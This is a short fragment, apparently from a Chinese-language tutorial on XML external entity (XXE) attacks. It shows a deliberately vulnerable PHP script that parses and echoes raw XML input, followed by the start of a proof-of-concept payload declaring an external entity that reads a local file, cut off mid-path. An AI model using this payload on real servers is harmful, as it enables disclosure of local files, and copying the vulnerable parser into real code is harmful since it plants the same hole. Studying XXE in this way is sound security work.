<?php $xmlfile = file_get_contents('php://input'); $creds=simplexml_load_string($xmlfile); echo $creds; ?> 1 回显的类型 1.1 POC: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds [ <!ENTITY goodies SYSTEM "file:/…